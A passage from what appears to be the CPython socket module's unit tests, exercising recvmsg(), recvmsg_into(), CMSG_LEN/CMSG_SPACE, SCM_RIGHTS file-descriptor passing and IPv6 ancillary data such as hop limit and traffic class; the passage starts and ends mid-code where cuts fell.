# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
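# As a rough illustration (the exact values are platform-dependent,
# which is why the tests below only check relationships between the
# results): on a typical 64-bit Linux system, where struct cmsghdr is
# 16 bytes,
#
#   socket.CMSG_LEN(4)      # -> 20: header plus four bytes of data
#   socket.CMSG_SPACE(4)    # -> 24: CMSG_LEN(4) rounded up for alignment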
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
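# For orientation, a minimal SCM_RIGHTS exchange outside of this test
# harness (hypothetical, POSIX-only sketch) looks like:
#
#   import array, os, socket
#   a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
#   fd = os.open("/dev/null", os.O_RDONLY)
#   a.sendmsg([b"x"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
#                       array.array("i", [fd]))])
#   msg, ancdata, flags, addr = b.recvmsg(1, socket.CMSG_SPACE(4))
#   received = array.array("i")
#   received.frombytes(ancdata[0][2])   # kernel-duplicated descriptor(s)
#
# The helpers below generalise this pattern and add the bookkeeping
# needed to close every descriptor that the kernel duplicates.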
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
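# Sketch of the pattern exercised below (illustrative only, and
# assuming the RFC 3542 constants are available): the hop limit travels
# as a single native int in an IPPROTO_IPV6/IPV6_HOPLIMIT control
# message, and is only reported to the receiver once IPV6_RECVHOPLIMIT
# has been enabled on its socket, e.g.
#
#   serv.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVHOPLIMIT, 1)
#   cli.sendmsg([MSG], [(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
#                        array.array("i", [2]))])
#   msg, ancdata, flags, addr = serv.recvmsg(len(MSG), 10240)
#
# where "serv" and "cli" stand for the server- and client-side UDP6
# sockets set up by the concrete test classes.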
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
